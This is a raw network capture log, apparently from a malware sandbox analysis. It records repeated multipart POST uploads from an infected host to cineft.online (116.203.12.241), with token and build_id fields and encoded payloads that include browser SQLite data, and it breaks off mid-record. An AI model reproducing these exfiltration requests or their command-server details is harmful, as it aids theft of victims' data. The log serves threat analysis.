2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-14 22:59:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	50153	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:58 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VA1VKFU3EKF3E37900ZM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:58 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------VA1VKFU3EKF3E37900ZMContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------VA1VKFU3EKF3E37900ZMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VA1VKFU3EKF3E37900ZMCont
2024-12-14 22:59:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:58 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	50156	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:01 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IMO8YUKFUSJM7YMOPPPH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74 Data Ascii: ------IMO8YUKFUSJM7YMOPPPHContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------IMO8YUKFUSJM7YMOPPPHContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IMO8YUKFUSJM7YMOPPPHCont
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 